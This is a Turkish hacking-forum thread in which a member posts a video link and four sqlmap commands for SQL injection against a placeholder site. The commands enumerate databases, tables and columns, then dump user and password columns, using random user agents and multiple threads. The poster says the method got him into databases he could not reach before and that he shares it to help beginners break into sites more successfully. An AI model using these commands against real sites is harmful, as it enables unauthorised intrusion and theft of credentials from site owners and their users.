#Re-Design SQL Injection

Re-Design

Katılımcı Üye
6 May 2013
973
0
Bu SQL İnjection yöntemi genel tutorial videolarındaki sql komutlarından farklı


[ame="https://www.youtube.com/watch?v=IxomQWPVU-s&feature=youtu.be"]https://www.youtube.com/watch?v=IxomQWPVU-s&feature=youtu.be[/ame]

Komutlar hakkında

-random-agent:değerlerinin bulunduğu dosya içerisinden random olarak atanması için kullanılır

-threads: Multi-threading ile sqlmap'in maximum kaç tane HTTPS isteği yapabileceğini belirlemek için kullanılır, aramamızı oldukça hızlandıran bir yöntem

Örnek
Kod:
1. sqlmap -u www.siteadi.com/index.php?id=8* --random-agent --threads=10 --dbms=mysql --dbs
2. sqlmap -u www.siteadi.com/index.php?id=8* --random-agent --threads=10 --dbms=mysql -- Tablo adı --tables
3. sqlmap -u www.siteadi.com/index.php?id=8* --random-agent --threads=10 --dbms=mysql -- Tablo adı -T Stün adı --columns
4. sqlmap -u www.siteadi.com/index.php?id=8* --random-agent --threads=10 --dbms=mysql -- Tablo adı -T Stün adı -C users veya password --dump
 
Son düzenleme:

Zonza

Katılımcı Üye
26 Mar 2016
923
0
İzmir
Ellerine sağlık fakat başlığa "New" yazman yanlış..
Yeni bir şey değil sonuçta :)
 

Re-Design

Katılımcı Üye
6 May 2013
973
0
Farki nedir hocam ?

- Ellerinize saglik.

Farkı komutlarda işlev olarak farkını sorsan. Standart komutlarla siteye sızmaya çalıştığım sitelerde hatalarla karşılaşıyordum. Bu komutları yabancı sitede gördüm kullandım erişemediğim site dblarına rahatlıkla gire bildim. Bu videoyu daha çok SQL İnjection yeni başlayan ve siteye sızarken hata alıpda ruhdan düşen üyelerimiz için çektim. Sızma ihtimalinizi artırmak amaçlı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.